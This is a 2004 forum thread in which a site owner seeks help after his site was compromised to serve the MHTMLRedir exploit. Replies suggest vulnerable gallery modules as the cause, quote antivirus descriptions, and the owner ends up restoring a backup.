| Author |
Message |
dean
Worker
Joined: Apr 14, 2004
Posts: 193
|
 Posted:
Fri Nov 19, 2004 1:49 am |
|
I don't know how but someone got past my sentinel and patches to install the mhtmlredir.exploit virus and many peeps can't see the site and those that do are exposed to the virus. It's so bad I cant even log into ftp or cpanel. The host is supposedly sanitizing the site but I hope I can figure out how it all happened to begin with....... |
| |
|
|
|
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 17088
|
| Posted:
Fri Nov 19, 2004 2:34 am |
|
Do you use Coppermine or any other application that allows uploads? |
| |
|
|
|
|
dean
|
| Posted:
Fri Nov 19, 2004 3:14 am |
|
Yes, latest version of coppermine, enhanced downloads module and Z advertising. |
| |
|
|
|
|
Raven
|
| Posted:
Fri Nov 19, 2004 7:04 am |
|
My guess is that's your culprit, but you host needs to do an audit to see for sure. |
| |
|
|
|
|
jaded
Theme Guru
Joined: Nov 01, 2003
Posts: 1006
|
| Posted:
Fri Nov 19, 2004 8:02 am |
|
I agree with Raven. I have banned the use of coppermine and or my_Egallery on our server. The holes are enormous. We had a client whos site was turned into an eggdropper because of My_Egallery. I would strongly suggest a different gallery. I am currently very pleased with the one I use on my site. You may view it via my site in my signiture. Please be certain to remove all instances of the coppermine. That includes from your admin files. |
_________________
Themes BB Skins
http://www.jaded-designs.com
Graphic Tees
http://www.cafepress.com/jadeddesigns
Paranormal Tees
http://www.cafepress.com/HauntedTees
Ghost Stories & More
http://www.hauntingtales.net |
|
|
|
dean
|
| Posted:
Sat Nov 20, 2004 4:48 am |
|
I am stuck - my browser no longer allows me to view any of five sites i have installed at the alaskandog.com domain. All i get is the basic - site cannot be found error and when I click on properties the actual url is:
res://C:\WINDOWS\system32\shdoclc.dll/dnserror.htm#http://alaskandog.com
I've run norton antivirus, spybot, adaware and ad-ware programs to try and detect the problem to no avail. Search of google isnt helping... does anyone have some experience here? I am told the virus on my site is called the mhtmlredir.exploit. |
| |
|
|
|
|
hitwalker
Sells PC To Pay For Divorce
Joined:
Posts: 5661
|
| Posted:
Sat Nov 20, 2004 5:03 am |
|
thats strange ?.........
no google results ?
and what about this....http://securityresponse.symantec.com/avcenter/venc/data/mhtmlredir.exploit.html
Says clearly..."This threat allows a malicious Web site to download and execute programs on your computer"..
or this one...
Question
just got a message from norton that it found this virus but could not fix as access was denied. MHTMLRedir.Exploit. Should i be concerned by this.
Answer
Howdy:
Because this is an exploit only, there are no removal instructions, since there is nothing to remove. This is a detection for the exploit, preventing the execution of malicious content on your computer. By detecting the exploit, it is prevented from running.
and even with my busy life i give you another one....
Question
My computer has got the above and my anti-virus does nothing because it states it is an 'exploit' not a virus. I cannot change my IE homepage becuase it automatically defaults to the default setting, this is a straight forward search engine (http://searchpage.cc), neither can I download anything because it goes straight back to homepage, I am on broadband using windows XP, with windows internet explorer and I'm starting to despair if possible please help.
Answer
You have been infected with adware or spyware. Your antivirus won't remove it purely for legal reasons. Here is how those things often infect your computer. When you install some kinds of free software, or download things from some web sites, and click on the user license, in the teeny tiny and confusingly worded fine print, you end up agreeing to these nasty things.
For instant free help, try Ad-aware,
http://lavasoft.element5.com/software/adaware, and Spybot, http://www.safer-networking.org. You can use one or both together, they are compatible.
So the question now is,who's infected ?
I can see your maintenance page.... |
| |
|
|
|
|
jaded
|
| Posted:
Sat Nov 20, 2004 9:54 am |
|
Dean,
It sounds to me like you may be server banned. I see the page not displayed when my server bans me from time to time. My suggestion is for you to attempt to go to several sites that are also on the same hosting server. If you do not know what they are then I would contact your host for the information. It is best to find this out before you spend a lot of time looking for another answer. This will just let you rule out one thing. Of course if you can change your ip I would suggest that first. Be certain to look at your ip number before you attempt to change it. Then change it and look at it again. Sometimes a reboot wont change your ip. Double check! |
| |
|
|
|
|
dean
|
| Posted:
Sat Nov 20, 2004 11:12 pm |
|
Yea Jaded, it turned out I was server banned, host rectified earlier today. This after running three different virus detectors, adaware, ad-ware.......Once I was able to get in, I figured it was a msql injection, cause when i ran a virus dietector over the database tables, it detected and removed the item. Unfortunatelty, the remaining tables didnt work very well and I didnt want to mess any more with it - so I restored a backup from previous week.
Now the maddening problem is that my users come to this site primarily for the calendar and gallery both of which are vulnerable. If I get rid of either, the site will suffer. Changing to another gallery or calendar module will likely result in mucha keyboarding. Agrgh............................... I'm sure the regular users are getting fed up with the disruptions by now.......... |
| |
|
|
|
|
|
|
![[Valid RSS]](https://www.ravenphpscripts.com/images/valid-rss.png "Validate my RSS feed"){kind=small}
